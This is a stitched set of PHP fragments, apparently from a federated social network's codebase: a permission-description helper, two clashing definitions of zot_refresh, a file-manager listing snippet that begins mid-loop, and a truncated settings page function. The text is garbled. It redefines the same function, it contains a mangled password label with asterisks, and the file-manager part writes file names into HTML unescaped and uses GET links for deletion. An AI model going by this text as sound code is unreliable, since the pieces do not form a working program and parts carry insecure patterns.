/**
* This is the preferred way to create a PermissionDescription, as it provides the most details.
* Use this method if you know an empty ACL will result in one of the global default permissions
* being used, such as channel_r_stream (for which you would pass 'view_stream').
*
* @param string $permname - a key for the global perms array from get_perms() in permissions.php,
* e.g. 'view_stream', 'view_profile', etc.
* @return a new instance of PermissionDescription
*/
public static function fromGlobalPermission($permname)
{
$result = null;
$global_perms = get_perms();
if (array_key_exists($permname, $global_perms)) {
$permDetails = $global_perms[$permname];
// It should be OK to always just read the permissions from App::$channel
//
// App::$profile is a union of channel and profile fields.
// The distinction is basically that App::$profile is pointing to the resource
// being observed. App::$channel is referring to the current logged-in channel
// member (if this is a local channel) e.g. the observer. We only show the ACL
// widget to the page owner (observer and observed are the same) so in that case
// I believe either may be safely used here.
$channelPerm = \App::$channel[$permDetails[0]];
$result = new PermissionDescription($permDetails[1], $channelPerm);
} else {
// The acl dialog can handle null arguments, but it shouldn't happen
logger('null PermissionDescription from unknown global permission: ' . $permname, LOGGER_DEBUG, LOG_ERROR);
}
return $result;
}
/**
* @function: zot_refresh($them, $channel = null, $force = false)
*
* zot_refresh is typically invoked when somebody has changed permissions of a channel and they are notified
* to fetch new permissions via a finger/discovery operation. This may result in a new connection
* (abook entry) being added to a local channel and it may result in auto-permissions being granted.
*
* Friending in zot is accomplished by sending a refresh packet to a specific channel which indicates a
* permission change has been made by the sender which affects the target channel. The hub controlling
* the target channel does targetted discovery (a zot-finger request requesting permissions for the local
* channel). These are decoded here, and if necessary and abook structure (addressbook) is created to store
* the permissions assigned to this channel.
*
* Initially these abook structures are created with a 'pending' flag, so that no reverse permissions are
* implied until this is approved by the owner channel. A channel can also auto-populate permissions in
* return and send back a refresh packet of its own. This is used by forum and group communication channels
* so that friending and membership in the channel's "club" is automatic.
*
* @param array $them => xchan structure of sender
* @param array $channel => local channel structure of target recipient, required for "friending" operations
*
* @returns boolean true if successful, else false
*/
function zot_refresh($them, $channel = null, $force = false)
{
if (array_key_exists('xchan_network', $them) && $them['xchan_network'] !== 'zot') {
logger('zot_refresh: not got zot. ' . $them['xchan_name']);
return true;
}
logger('zot_refresh: them: ' . print_r($them, true), LOGGER_DATA);
if ($channel) {
logger('zot_refresh: channel: ' . print_r($channel, true), LOGGER_DATA);
}
if ($them['hubloc_url']) {
$url = $them['hubloc_url'];
} else {
$r = q("select hubloc_url from hubloc where hubloc_hash = '%s' and ( hubloc_flags & %d ) limit 1", dbesc($them['xchan_hash']), intval(HUBLOC_FLAGS_PRIMARY));
if ($r) {
$url = $r[0]['hubloc_url'];
}
}
if (!$url) {
logger('zot_refresh: no url');
return false;
}
$postvars = array();
if ($channel) {
$postvars['target'] = $channel['channel_guid'];
$postvars['target_sig'] = $channel['channel_guid_sig'];
$postvars['key'] = $channel['channel_pubkey'];
}
if (array_key_exists('xchan_addr', $them) && $them['xchan_addr']) {
$postvars['address'] = $them['xchan_addr'];
}
if (array_key_exists('xchan_hash', $them) && $them['xchan_hash']) {
$postvars['guid_hash'] = $them['xchan_hash'];
}
if (array_key_exists('xchan_guid', $them) && $them['xchan_guid'] && array_key_exists('xchan_guid_sig', $them) && $them['xchan_guid_sig']) {
$postvars['guid'] = $them['xchan_guid'];
$postvars['guid_sig'] = $them['xchan_guid_sig'];
}
$rhs = '/.well-known/zot-info';
$result = z_post_url($url . $rhs, $postvars);
logger('zot_refresh: zot-info: ' . print_r($result, true), LOGGER_DATA);
if ($result['success']) {
$j = json_decode($result['body'], true);
if (!($j && $j['success'])) {
logger('zot_refresh: result not decodable');
return false;
}
$x = import_xchan($j, $force ? UPDATE_FLAGS_FORCED : UPDATE_FLAGS_UPDATED);
if (!$x['success']) {
return false;
}
$their_perms = 0;
if ($channel) {
$global_perms = get_perms();
if ($j['permissions']['data']) {
$permissions = crypto_unencapsulate(array('data' => $j['permissions']['data'], 'key' => $j['permissions']['key'], 'iv' => $j['permissions']['iv']), $channel['channel_prvkey']);
if ($permissions) {
$permissions = json_decode($permissions, true);
}
logger('decrypted permissions: ' . print_r($permissions, true), LOGGER_DATA);
} else {
$permissions = $j['permissions'];
}
$connected_set = false;
if ($permissions && is_array($permissions)) {
foreach ($permissions as $k => $v) {
// The connected permission means you are in their address book
if ($k === 'connected') {
$connected_set = intval($v);
continue;
}
if ($v && array_key_exists($k, $global_perms)) {
$their_perms = $their_perms | intval($global_perms[$k][1]);
}
}
}
$r = q("select * from abook where abook_xchan = '%s' and abook_channel = %d and not (abook_flags & %d) limit 1", dbesc($x['hash']), intval($channel['channel_id']), intval(ABOOK_FLAG_SELF));
if (array_key_exists('profile', $j) && array_key_exists('next_birthday', $j['profile'])) {
$next_birthday = datetime_convert('UTC', 'UTC', $j['profile']['next_birthday']);
} else {
$next_birthday = NULL_DATE;
}
if ($r) {
// if the dob is the same as what we have stored (disregarding the year), keep the one
// we have as we may have updated the year after sending a notification; and resetting
// to the one we just received would cause us to create duplicated events.
if (substr($r[0]['abook_dob'], 5) == substr($next_birthday, 5)) {
$next_birthday = $r[0]['abook_dob'];
}
$current_abook_connected = $r[0]['abook_flags'] & ABOOK_FLAG_UNCONNECTED ? 0 : 1;
$y = q("update abook set abook_their_perms = %d, abook_dob = '%s'\n\t\t\t\t\twhere abook_xchan = '%s' and abook_channel = %d \n\t\t\t\t\tand not (abook_flags & %d) limit 1", intval($their_perms), dbesc($next_birthday), dbesc($x['hash']), intval($channel['channel_id']), intval(ABOOK_FLAG_SELF));
// if(($connected_set === 0 || $connected_set === 1) && ($connected_set !== $current_abook_unconnected)) {
// if they are in your address book but you aren't in theirs, and/or this does not
// match your current connected state setting, toggle it.
// $y1 = q("update abook set abook_flags = (abook_flags ^ %d)
// where abook_xchan = '%s' and abook_channel = %d
// and not (abook_flags & %d) limit 1",
// intval(ABOOK_FLAG_UNCONNECTED),
// dbesc($x['hash']),
// intval($channel['channel_id']),
// intval(ABOOK_FLAG_SELF)
// );
// }
if (!$y) {
logger('abook update failed');
} else {
// if we were just granted read stream permission and didn't have it before, try to pull in some posts
if (!($r[0]['abook_their_perms'] & PERMS_R_STREAM) && $their_perms & PERMS_R_STREAM) {
proc_run('php', 'include/onepoll.php', $r[0]['abook_id']);
}
}
} else {
$default_perms = 0;
// look for default permissions to apply in return - e.g. auto-friend
$z = q("select * from abook where abook_channel = %d and (abook_flags & %d) limit 1", intval($channel['channel_id']), intval(ABOOK_FLAG_SELF));
if ($z) {
$default_perms = intval($z[0]['abook_my_perms']);
}
// Keep original perms to check if we need to notify them
$previous_perms = get_all_perms($channel['channel_id'], $x['hash']);
$y = q("insert into abook ( abook_account, abook_channel, abook_xchan, abook_their_perms, abook_my_perms, abook_created, abook_updated, abook_dob, abook_flags ) values ( %d, %d, '%s', %d, %d, '%s', '%s', '%s', %d )", intval($channel['channel_account_id']), intval($channel['channel_id']), dbesc($x['hash']), intval($their_perms), intval($default_perms), dbesc(datetime_convert()), dbesc(datetime_convert()), dbesc($next_birthday), intval($default_perms ? 0 : ABOOK_FLAG_PENDING));
if ($y) {
logger("New introduction received for {$channel['channel_name']}");
$new_perms = get_all_perms($channel['channel_id'], $x['hash']);
if ($new_perms != $previous_perms) {
// Send back a permissions update if permissions have changed
$z = q("select * from abook where abook_xchan = '%s' and abook_channel = %d and not (abook_flags & %d) limit 1", dbesc($x['hash']), intval($channel['channel_id']), intval(ABOOK_FLAG_SELF));
if ($z) {
proc_run('php', 'include/notifier.php', 'permission_update', $z[0]['abook_id']);
}
}
$new_connection = q("select abook_id, abook_flags from abook where abook_channel = %d and abook_xchan = '%s' order by abook_created desc limit 1", intval($channel['channel_id']), dbesc($x['hash']));
if ($new_connection) {
require_once 'include/enotify.php';
notification(array('type' => NOTIFY_INTRO, 'from_xchan' => $x['hash'], 'to_xchan' => $channel['channel_hash'], 'link' => z_root() . '/connedit/' . $new_connection[0]['abook_id']));
}
if ($new_connection && $their_perms & PERMS_R_STREAM) {
if ($channel['channel_w_stream'] & PERMS_PENDING || !($new_connection[0]['abook_flags'] & ABOOK_FLAG_PENDING)) {
proc_run('php', 'include/onepoll.php', $new_connection[0]['abook_id']);
}
}
}
}
}
return true;
}
return false;
}
/**
* @brief Refreshes after permission changed or friending, etc.
*
* zot_refresh is typically invoked when somebody has changed permissions of a channel and they are notified
* to fetch new permissions via a finger/discovery operation. This may result in a new connection
* (abook entry) being added to a local channel and it may result in auto-permissions being granted.
*
* Friending in zot is accomplished by sending a refresh packet to a specific channel which indicates a
* permission change has been made by the sender which affects the target channel. The hub controlling
* the target channel does targetted discovery (a zot-finger request requesting permissions for the local
* channel). These are decoded here, and if necessary and abook structure (addressbook) is created to store
* the permissions assigned to this channel.
*
* Initially these abook structures are created with a 'pending' flag, so that no reverse permissions are
* implied until this is approved by the owner channel. A channel can also auto-populate permissions in
* return and send back a refresh packet of its own. This is used by forum and group communication channels
* so that friending and membership in the channel's "club" is automatic.
*
* @param array $them => xchan structure of sender
* @param array $channel => local channel structure of target recipient, required for "friending" operations
* @param array $force default false
*
* @returns boolean true if successful, else false
*/
function zot_refresh($them, $channel = null, $force = false)
{
if (array_key_exists('xchan_network', $them) && $them['xchan_network'] !== 'zot') {
logger('zot_refresh: not got zot. ' . $them['xchan_name']);
return true;
}
logger('zot_refresh: them: ' . print_r($them, true), LOGGER_DATA);
if ($channel) {
logger('zot_refresh: channel: ' . print_r($channel, true), LOGGER_DATA);
}
$url = null;
if ($them['hubloc_url']) {
$url = $them['hubloc_url'];
} else {
$r = null;
// if they re-installed the server we could end up with the wrong record - pointing to the old install.
// We'll order by reverse id to try and pick off the newest one first and hopefully end up with the
// correct hubloc. If this doesn't work we may have to re-write this section to try them all.
if (array_key_exists('xchan_addr', $them) && $them['xchan_addr']) {
$r = q("select hubloc_url, hubloc_primary from hubloc where hubloc_addr = '%s' order by hubloc_id desc", dbesc($them['xchan_addr']));
}
if (!$r) {
$r = q("select hubloc_url, hubloc_primary from hubloc where hubloc_hash = '%s' order by hubloc_id desc", dbesc($them['xchan_hash']));
}
if ($r) {
foreach ($r as $rr) {
if (intval($rr['hubloc_primary'])) {
$url = $rr['hubloc_url'];
break;
}
}
if (!$url) {
$url = $r[0]['hubloc_url'];
}
}
}
if (!$url) {
logger('zot_refresh: no url');
return false;
}
$postvars = array();
if ($channel) {
$postvars['target'] = $channel['channel_guid'];
$postvars['target_sig'] = $channel['channel_guid_sig'];
$postvars['key'] = $channel['channel_pubkey'];
}
if (array_key_exists('xchan_addr', $them) && $them['xchan_addr']) {
$postvars['address'] = $them['xchan_addr'];
}
if (array_key_exists('xchan_hash', $them) && $them['xchan_hash']) {
$postvars['guid_hash'] = $them['xchan_hash'];
}
if (array_key_exists('xchan_guid', $them) && $them['xchan_guid'] && array_key_exists('xchan_guid_sig', $them) && $them['xchan_guid_sig']) {
$postvars['guid'] = $them['xchan_guid'];
$postvars['guid_sig'] = $them['xchan_guid_sig'];
}
$rhs = '/.well-known/zot-info';
$result = z_post_url($url . $rhs, $postvars);
logger('zot_refresh: zot-info: ' . print_r($result, true), LOGGER_DATA);
if ($result['success']) {
$j = json_decode($result['body'], true);
if (!($j && $j['success'])) {
logger('zot_refresh: result not decodable');
return false;
}
$x = import_xchan($j, $force ? UPDATE_FLAGS_FORCED : UPDATE_FLAGS_UPDATED);
if (!$x['success']) {
return false;
}
$their_perms = 0;
if ($channel) {
$global_perms = get_perms();
if ($j['permissions']['data']) {
$permissions = crypto_unencapsulate(array('data' => $j['permissions']['data'], 'key' => $j['permissions']['key'], 'iv' => $j['permissions']['iv']), $channel['channel_prvkey']);
if ($permissions) {
$permissions = json_decode($permissions, true);
}
logger('decrypted permissions: ' . print_r($permissions, true), LOGGER_DATA);
} else {
$permissions = $j['permissions'];
}
$connected_set = false;
if ($permissions && is_array($permissions)) {
foreach ($permissions as $k => $v) {
// The connected permission means you are in their address book
if ($k === 'connected') {
$connected_set = intval($v);
continue;
}
if ($v && array_key_exists($k, $global_perms)) {
$their_perms = $their_perms | intval($global_perms[$k][1]);
}
}
}
if (array_key_exists('profile', $j) && array_key_exists('next_birthday', $j['profile'])) {
$next_birthday = datetime_convert('UTC', 'UTC', $j['profile']['next_birthday']);
} else {
$next_birthday = NULL_DATE;
}
$r = q("select * from abook where abook_xchan = '%s' and abook_channel = %d and abook_self = 0 limit 1", dbesc($x['hash']), intval($channel['channel_id']));
if ($r) {
// connection exists
// if the dob is the same as what we have stored (disregarding the year), keep the one
// we have as we may have updated the year after sending a notification; and resetting
// to the one we just received would cause us to create duplicated events.
if (substr($r[0]['abook_dob'], 5) == substr($next_birthday, 5)) {
$next_birthday = $r[0]['abook_dob'];
}
$current_abook_connected = intval($r[0]['abook_unconnected']) ? 0 : 1;
$y = q("update abook set abook_their_perms = %d, abook_dob = '%s'\n\t\t\t\t\twhere abook_xchan = '%s' and abook_channel = %d\n\t\t\t\t\tand abook_self = 0 ", intval($their_perms), dbescdate($next_birthday), dbesc($x['hash']), intval($channel['channel_id']));
// if(($connected_set === 0 || $connected_set === 1) && ($connected_set !== $current_abook_unconnected)) {
// if they are in your address book but you aren't in theirs, and/or this does not
// match your current connected state setting, toggle it.
/** @FIXME uncoverted to postgres */
/** @FIXME when this was enabled, all contacts became unconnected. Currently disabled intentionally */
// $y1 = q("update abook set abook_unconnected = 1
// where abook_xchan = '%s' and abook_channel = %d
// and abook_self = 0 limit 1",
// dbesc($x['hash']),
// intval($channel['channel_id'])
// );
// }
if (!$y) {
logger('abook update failed');
} else {
// if we were just granted read stream permission and didn't have it before, try to pull in some posts
if (!($r[0]['abook_their_perms'] & PERMS_R_STREAM) && $their_perms & PERMS_R_STREAM) {
proc_run('php', 'include/onepoll.php', $r[0]['abook_id']);
}
}
} else {
// new connection
$role = get_pconfig($channel['channel_id'], 'system', 'permissions_role');
if ($role) {
$xx = get_role_perms($role);
if ($xx['perms_auto']) {
$default_perms = $xx['perms_accept'];
}
}
if (!$default_perms) {
$default_perms = intval(get_pconfig($channel['channel_id'], 'system', 'autoperms'));
}
// Keep original perms to check if we need to notify them
$previous_perms = get_all_perms($channel['channel_id'], $x['hash']);
$closeness = get_pconfig($channel['channel_id'], 'system', 'new_abook_closeness');
if ($closeness === false) {
$closeness = 80;
}
$y = q("insert into abook ( abook_account, abook_channel, abook_closeness, abook_xchan, abook_their_perms, abook_my_perms, abook_created, abook_updated, abook_dob, abook_pending ) values ( %d, %d, %d, '%s', %d, %d, '%s', '%s', '%s', %d )", intval($channel['channel_account_id']), intval($channel['channel_id']), intval($closeness), dbesc($x['hash']), intval($their_perms), intval($default_perms), dbesc(datetime_convert()), dbesc(datetime_convert()), dbesc($next_birthday), intval($default_perms ? 0 : 1));
if ($y) {
logger("New introduction received for {$channel['channel_name']}");
$new_perms = get_all_perms($channel['channel_id'], $x['hash']);
// Send a clone sync packet and a permissions update if permissions have changed
$new_connection = q("select * from abook left join xchan on abook_xchan = xchan_hash where abook_xchan = '%s' and abook_channel = %d and abook_self = 0 order by abook_created desc limit 1", dbesc($x['hash']), intval($channel['channel_id']));
if ($new_connection) {
if ($new_perms != $previous_perms) {
proc_run('php', 'include/notifier.php', 'permission_create', $new_connection[0]['abook_id']);
}
require_once 'include/enotify.php';
notification(array('type' => NOTIFY_INTRO, 'from_xchan' => $x['hash'], 'to_xchan' => $channel['channel_hash'], 'link' => z_root() . '/connedit/' . $new_connection[0]['abook_id']));
if ($their_perms & PERMS_R_STREAM) {
if ($channel['channel_w_stream'] & PERMS_PENDING || !intval($new_connection[0]['abook_pending'])) {
proc_run('php', 'include/onepoll.php', $new_connection[0]['abook_id']);
}
}
unset($new_connection[0]['abook_id']);
unset($new_connection[0]['abook_account']);
unset($new_connection[0]['abook_channel']);
build_sync_packet($channel['channel_id'], array('abook' => $new_connection));
}
}
}
}
return true;
}
return false;
}
echo "<a href='".$urlpath."?action=delete&workpath=".$dirpath."&file=".$dirpath."/".$dirlist[$i]."'>$deleteimg</a>";
echo "<a href='".$urlpath."?action=rename&workpath=".$dirpath."&file=".$dirpath."/".$dirlist[$i]."'>$renameimg</a> ";
//echo "<a href='".$urlpath."?rootpath=".$dirpath."/".$dirlist[$i]."'>ChDr</a> ";
echo "</td></tr>";
}
//Get file info and details
for ($i=0;$i<Count($filelist);$i++) {
echo "<tr>";
$file = $dirpath."/".$filelist[$i];
$icon = get_icon($dirpath."/".$filelist[$i]);
echo "<td width='4%' align='center'><img src=$pathtoimages$icon></td>";
echo "<td class='filemantext' style='white-space:nowrap' onmouseover='this.style.cursor=\"hand\";'><a href='".$rootURL."/$filelist[$i]'>".$filelist[$i]."</a></td>";
echo "<td align='left' class='filemantext'>".myfilesize($file)."</td>";
echo "<td align='left' class='filemantext'>".$mimetype->getType($file)."</td>";
echo "<td align='left' class='filemantext'>".lastaccess($file, "E1")."</td>";
echo "<td align='center' class='filemantext' >".get_perms($file)."</td>";
echo "<td align='left' class='filemantext' >";
if (is_viewable_file($file))
echo "<a href='".$rootURL."/".$filelist[$i]."' target='_blank' >$viewimg</a> ";
if (is_editable_file($dirpath."/".$filelist[$i]))
echo "<a href='".$urlpath."?action=edit&workpath=".$dirpath."&file=".$filelist[$i]."'>$editimg</a> ";
echo "<a href='".$urlpath."?action=delete&workpath=".$dirpath."&file=".$dirpath."/".$filelist[$i]."'>$deleteimg</a> ";
echo "<a href='".$urlpath."?action=rename&workpath=".$dirpath."&file=".$dirpath."/".$filelist[$i]."'>$renameimg</a> ";
echo "<a href='".$urlpath."?action=download&file=".$dirpath."/".$filelist[$i]."'>$downimg</a> ";
echo "</tr>";
}
echo "<tr>";
$diskfree = freespace($dirpath);
echo "<td class='barbottom' align='left' colspan =3>".$dircount = sizeof($dirlist)." Directories /".$filecount =sizeof($filelist)." files</td>";
echo "<td class='barbottom' align='left' colspan =4>"._AM_FREEDISKSPACE."</b> ".format_size($diskfree)."</td>";
echo "</tr>";
function settings_content(&$a)
{
$o = '';
nav_set_selected('settings');
if (!local_channel() || $_SESSION['delegate']) {
notice(t('Permission denied.') . EOL);
return login();
}
$channel = $a->get_channel();
if ($channel) {
head_set_icon($channel['xchan_photo_s']);
}
$yes_no = array(t('No'), t('Yes'));
if (argc() > 1 && argv(1) === 'oauth') {
if (argc() > 2 && argv(2) === 'add') {
$tpl = get_markup_template("settings_oauth_edit.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_oauth"), '$title' => t('Add application'), '$submit' => t('Submit'), '$cancel' => t('Cancel'), '$name' => array('name', t('Name'), '', t('Name of application')), '$key' => array('key', t('Consumer Key'), random_string(16), t('Automatically generated - change if desired. Max length 20')), '$secret' => array('secret', t('Consumer Secret'), random_string(16), t('Automatically generated - change if desired. Max length 20')), '$redirect' => array('redirect', t('Redirect'), '', t('Redirect URI - leave blank unless your application specifically requires this')), '$icon' => array('icon', t('Icon url'), '', t('Optional'))));
return $o;
}
if (argc() > 3 && argv(2) === 'edit') {
$r = q("SELECT * FROM clients WHERE client_id='%s' AND uid=%d", dbesc(argv(3)), local_channel());
if (!count($r)) {
notice(t("You can't edit this application."));
return;
}
$app = $r[0];
$tpl = get_markup_template("settings_oauth_edit.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_oauth"), '$title' => t('Add application'), '$submit' => t('Update'), '$cancel' => t('Cancel'), '$name' => array('name', t('Name'), $app['name'], ''), '$key' => array('key', t('Consumer Key'), $app['client_id'], ''), '$secret' => array('secret', t('Consumer Secret'), $app['pw'], ''), '$redirect' => array('redirect', t('Redirect'), $app['redirect_uri'], ''), '$icon' => array('icon', t('Icon url'), $app['icon'], '')));
return $o;
}
if (argc() > 3 && argv(2) === 'delete') {
check_form_security_token_redirectOnErr('/settings/oauth', 'settings_oauth', 't');
$r = q("DELETE FROM clients WHERE client_id='%s' AND uid=%d", dbesc(argv(3)), local_channel());
goaway($a->get_baseurl(true) . "/settings/oauth/");
return;
}
$r = q("SELECT clients.*, tokens.id as oauth_token, (clients.uid=%d) AS my \n\t\t\t\tFROM clients\n\t\t\t\tLEFT JOIN tokens ON clients.client_id=tokens.client_id\n\t\t\t\tWHERE clients.uid IN (%d,0)", local_channel(), local_channel());
$tpl = get_markup_template("settings_oauth.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_oauth"), '$baseurl' => $a->get_baseurl(true), '$title' => t('Connected Apps'), '$add' => t('Add application'), '$edit' => t('Edit'), '$delete' => t('Delete'), '$consumerkey' => t('Client key starts with'), '$noname' => t('No name'), '$remove' => t('Remove authorization'), '$apps' => $r));
return $o;
}
if (argc() > 1 && argv(1) === 'featured') {
$settings_addons = "";
$o = '';
$r = q("SELECT * FROM `hook` WHERE `hook` = 'feature_settings' ");
if (!$r) {
$settings_addons = t('No feature settings configured');
}
call_hooks('feature_settings', $settings_addons);
$tpl = get_markup_template("settings_addons.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_featured"), '$title' => t('Feature/Addon Settings'), '$settings_addons' => $settings_addons));
return $o;
}
/*
* ACCOUNT SETTINGS
*/
if (argc() > 1 && argv(1) === 'account') {
$account_settings = "";
call_hooks('account_settings', $account_settings);
$email = $a->account['account_email'];
$tpl = get_markup_template("settings_account.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_account"), '$title' => t('Account Settings'), '$password1' => array('npassword', t('Enter New Password:'******'', ''), '$password2' => array('confirm', t('Confirm New Password:'******'', t('Leave password fields blank unless changing')), '$submit' => t('Submit'), '$email' => array('email', t('Email Address:'), $email, ''), '$removeme' => t('Remove Account'), '$removeaccount' => t('Remove this account including all its channels'), '$account_settings' => $account_settings));
return $o;
}
if (argc() > 1 && argv(1) === 'features') {
$arr = array();
$features = get_features();
foreach ($features as $fname => $fdata) {
$arr[$fname] = array();
$arr[$fname][0] = $fdata[0];
foreach (array_slice($fdata, 1) as $f) {
$arr[$fname][1][] = array('feature_' . $f[0], $f[1], intval(feature_enabled(local_channel(), $f[0])) ? "1" : '', $f[2], array(t('Off'), t('On')));
}
}
$tpl = get_markup_template("settings_features.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_features"), '$title' => t('Additional Features'), '$features' => $arr, '$submit' => t('Submit')));
return $o;
}
if (argc() > 1 && argv(1) === 'connectors') {
$settings_connectors = "";
call_hooks('connector_settings', $settings_connectors);
$r = null;
$tpl = get_markup_template("settings_connectors.tpl");
$o .= replace_macros($tpl, array('$form_security_token' => get_form_security_token("settings_connectors"), '$title' => t('Connector Settings'), '$submit' => t('Submit'), '$settings_connectors' => $settings_connectors));
call_hooks('display_settings', $o);
return $o;
}
/*
* DISPLAY SETTINGS
*/
if (argc() > 1 && argv(1) === 'display') {
$default_theme = get_config('system', 'theme');
if (!$default_theme) {
$default_theme = 'default';
}
$default_mobile_theme = get_config('system', 'mobile_theme');
if (!$mobile_default_theme) {
$mobile_default_theme = 'none';
}
$allowed_themes_str = get_config('system', 'allowed_themes');
$allowed_themes_raw = explode(',', $allowed_themes_str);
$allowed_themes = array();
if (count($allowed_themes_raw)) {
foreach ($allowed_themes_raw as $x) {
if (strlen(trim($x)) && is_dir("view/theme/{$x}")) {
$allowed_themes[] = trim($x);
}
}
}
$themes = array();
$files = glob('view/theme/*');
if ($allowed_themes) {
foreach ($allowed_themes as $th) {
$f = $th;
$is_experimental = file_exists('view/theme/' . $th . '/experimental');
$unsupported = file_exists('view/theme/' . $th . '/unsupported');
$is_mobile = file_exists('view/theme/' . $th . '/mobile');
$is_library = file_exists('view/theme/' . $th . '/library');
$mobile_themes["---"] = t("No special theme for mobile devices");
if (!$is_experimental or $is_experimental && (get_config('experimentals', 'exp_themes') == 1 or get_config('experimentals', 'exp_themes') === false)) {
$theme_name = $is_experimental ? sprintf(t('%s - (Experimental)'), $f) : $f;
if (!$is_library) {
if ($is_mobile) {
$mobile_themes[$f] = $themes[$f] = $theme_name . ' (' . t('mobile') . ')';
} else {
$mobile_themes[$f] = $themes[$f] = $theme_name;
}
}
}
}
}
$theme_selected = !x($_SESSION, 'theme') ? $default_theme : $_SESSION['theme'];
$mobile_theme_selected = !x($_SESSION, 'mobile_theme') ? $default_mobile_theme : $_SESSION['mobile_theme'];
$user_scalable = get_pconfig(local_channel(), 'system', 'user_scalable');
$user_scalable = $user_scalable === false ? '1' : $user_scalable;
// default if not set: 1
$browser_update = intval(get_pconfig(local_channel(), 'system', 'update_interval'));
$browser_update = $browser_update == 0 ? 80 : $browser_update / 1000;
// default if not set: 40 seconds
$itemspage = intval(get_pconfig(local_channel(), 'system', 'itemspage'));
$itemspage = $itemspage > 0 && $itemspage < 101 ? $itemspage : 20;
// default if not set: 20 items
$nosmile = get_pconfig(local_channel(), 'system', 'no_smilies');
$nosmile = $nosmile === false ? '0' : $nosmile;
// default if not set: 0
$title_tosource = get_pconfig(local_channel(), 'system', 'title_tosource');
$title_tosource = $title_tosource === false ? '0' : $title_tosource;
// default if not set: 0
$theme_config = "";
if (($themeconfigfile = get_theme_config_file($theme_selected)) != null) {
require_once $themeconfigfile;
$theme_config = theme_content($a);
}
$tpl = get_markup_template("settings_display.tpl");
$o = replace_macros($tpl, array('$ptitle' => t('Display Settings'), '$d_tset' => t('Theme Settings'), '$d_ctset' => t('Custom Theme Settings'), '$d_cset' => t('Content Settings'), '$form_security_token' => get_form_security_token("settings_display"), '$submit' => t('Submit'), '$baseurl' => $a->get_baseurl(true), '$uid' => local_channel(), '$theme' => $themes ? array('theme', t('Display Theme:'), $theme_selected, '', $themes, 'preview') : false, '$mobile_theme' => $mobile_themes ? array('mobile_theme', t('Mobile Theme:'), $mobile_theme_selected, '', $mobile_themes, '') : false, '$user_scalable' => array('user_scalable', t("Enable user zoom on mobile devices"), $user_scalable, '', $yes_no), '$ajaxint' => array('browser_update', t("Update browser every xx seconds"), $browser_update, t('Minimum of 10 seconds, no maximum')), '$itemspage' => array('itemspage', t("Maximum number of conversations to load at any time:"), $itemspage, t('Maximum of 100 items')), '$nosmile' => array('nosmile', t("Show emoticons (smilies) as images"), 1 - intval($nosmile), '', $yes_no), '$title_tosource' => array('title_tosource', t("Link post titles to source"), $title_tosource, '', $yes_no), '$layout_editor' => t('System Page Layout Editor - (advanced)'), '$theme_config' => $theme_config, '$expert' => feature_enabled(local_channel(), 'expert'), '$channel_list_mode' => array('channel_list_mode', t('Use blog/list mode on channel page'), get_pconfig(local_channel(), 'system', 'channel_list_mode'), t('(comments displayed separately)'), $yes_no), '$network_list_mode' => array('network_list_mode', t('Use blog/list mode on grid page'), get_pconfig(local_channel(), 'system', 'network_list_mode'), t('(comments displayed separately)'), $yes_no), '$channel_divmore_height' => array('channel_divmore_height', t('Channel page max height of content (in pixels)'), get_pconfig(local_channel(), 'system', 'channel_divmore_height') ? get_pconfig(local_channel(), 'system', 'channel_divmore_height') : 400, t('click to expand content exceeding this height')), '$network_divmore_height' => array('network_divmore_height', t('Grid page max height of content (in pixels)'), get_pconfig(local_channel(), 'system', 'network_divmore_height') ? get_pconfig(local_channel(), 'system', 'network_divmore_height') : 400, t('click to expand content exceeding this height'))));
return $o;
}
if (argv(1) === 'channel') {
require_once 'include/acl_selectors.php';
require_once 'include/permissions.php';
$p = q("SELECT * FROM `profile` WHERE `is_default` = 1 AND `uid` = %d LIMIT 1", intval(local_channel()));
if (count($p)) {
$profile = $p[0];
}
load_pconfig(local_channel(), 'expire');
$channel = $a->get_channel();
$global_perms = get_perms();
$permiss = array();
$perm_opts = array(array(t('Nobody except yourself'), 0), array(t('Only those you specifically allow'), PERMS_SPECIFIC), array(t('Approved connections'), PERMS_CONTACTS), array(t('Any connections'), PERMS_PENDING), array(t('Anybody on this website'), PERMS_SITE), array(t('Anybody in this network'), PERMS_NETWORK), array(t('Anybody authenticated'), PERMS_AUTHED), array(t('Anybody on the internet'), PERMS_PUBLIC));
foreach ($global_perms as $k => $perm) {
$options = array();
foreach ($perm_opts as $opt) {
if (!$perm[2] && $opt[1] == PERMS_PUBLIC) {
continue;
}
$options[$opt[1]] = $opt[0];
}
$permiss[] = array($k, $perm[3], $channel[$perm[0]], $perm[4], $options);
}
// logger('permiss: ' . print_r($permiss,true));
$username = $channel['channel_name'];
$nickname = $channel['channel_address'];
$timezone = $channel['channel_timezone'];
$notify = $channel['channel_notifyflags'];
$defloc = $channel['channel_location'];
$maxreq = $channel['channel_max_friend_req'];
$expire = $channel['channel_expire_days'];
$adult_flag = intval($channel['channel_pageflags'] & PAGE_ADULT);
$sys_expire = get_config('system', 'default_expire_days');
// $unkmail = $a->user['unkmail'];
// $cntunkmail = $a->user['cntunkmail'];
$hide_presence = intval(get_pconfig(local_channel(), 'system', 'hide_online_status'));
$expire_items = get_pconfig(local_channel(), 'expire', 'items');
$expire_items = $expire_items === false ? '1' : $expire_items;
// default if not set: 1
$expire_notes = get_pconfig(local_channel(), 'expire', 'notes');
$expire_notes = $expire_notes === false ? '1' : $expire_notes;
// default if not set: 1
$expire_starred = get_pconfig(local_channel(), 'expire', 'starred');
$expire_starred = $expire_starred === false ? '1' : $expire_starred;
// default if not set: 1
$expire_photos = get_pconfig(local_channel(), 'expire', 'photos');
$expire_photos = $expire_photos === false ? '0' : $expire_photos;
// default if not set: 0
$expire_network_only = get_pconfig(local_channel(), 'expire', 'network_only');
$expire_network_only = $expire_network_only === false ? '0' : $expire_network_only;
// default if not set: 0
$suggestme = get_pconfig(local_channel(), 'system', 'suggestme');
$suggestme = $suggestme === false ? '0' : $suggestme;
// default if not set: 0
$post_newfriend = get_pconfig(local_channel(), 'system', 'post_newfriend');
$post_newfriend = $post_newfriend === false ? '0' : $post_newfriend;
// default if not set: 0
$post_joingroup = get_pconfig(local_channel(), 'system', 'post_joingroup');
$post_joingroup = $post_joingroup === false ? '0' : $post_joingroup;
// default if not set: 0
